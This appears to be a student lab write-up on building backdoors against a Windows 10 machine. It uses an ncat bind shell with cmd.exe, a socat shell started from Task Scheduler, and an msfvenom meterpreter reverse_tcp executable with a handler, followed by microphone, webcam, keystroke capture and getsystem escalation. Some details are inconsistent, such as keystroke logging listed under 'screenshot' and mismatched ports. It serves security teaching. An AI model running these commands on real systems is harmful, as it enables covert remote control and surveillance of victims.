20155304《网络对抗》Exp2 后门原理与实践

20155332《网络对抗》Exp2 后门原理与实践

实验内容 (3.5分)

(1)使用netcat获取主机操作Shell,cron启动 (0.5分)

(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

实验步骤

3.1使用netcat获取主机操作Shell,cron启动

1.在win10的cmd里,查询本机ip。
image
ip为192.168.1.101

2.在win10的cmd里,进入ncat,输入ncat -l -e cmd.exe -p 5304
image
2.在kali的终端里,输入nc 192.168.1.101 5304 连接win10,获得shell权限

image

3.2使用socat获取主机操作Shell, 任务计划启动

1.在win10中进入控制面板->系统和安全->管理工具->任务计划程序
然后选择创建一个新任务,填写好任务名称;新建一个触发器,并设置触发器的相关参数;新建操作,设置如图相关参数tcp-listen:端口号 exec:cmd.exe,pty,stderr

image

image

image

2.在kali虚拟机中,socat - tcp:192.168.1.101:5404
,就可以获得win10的shell权限了

3.3使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在kali虚拟机中用Meterpreter生成后门。
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.128 LPORT=5304 -f exe > backdoor.exe
image

通过nc指令将生成的后门程序传送到Windows主机上:
image

在kali虚拟机终端输入 msfconsole

image

在msf的命令下输入命令use exploit/multi/handler,payload设置命令set payload windows/meterpreter/reverse_tcp,继续设置IP(此处设置虚拟机的Linux的IP地址)和端口

image

Linux使用exploit命令开始监听,此时在Win上执行后门程序。

image

打开Windows上的后门程序

此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:

image

录音功能:record_mic

image

拍照功能:webcam_snap

image

image

拍摄视频功能:webcam_stream

image

记录击键功能:screenshot

image

提权:getuid以及getsystem

image

posted @ 2018-04-04 00:17  田宜楠20155304  阅读(177)  评论(0编辑  收藏  举报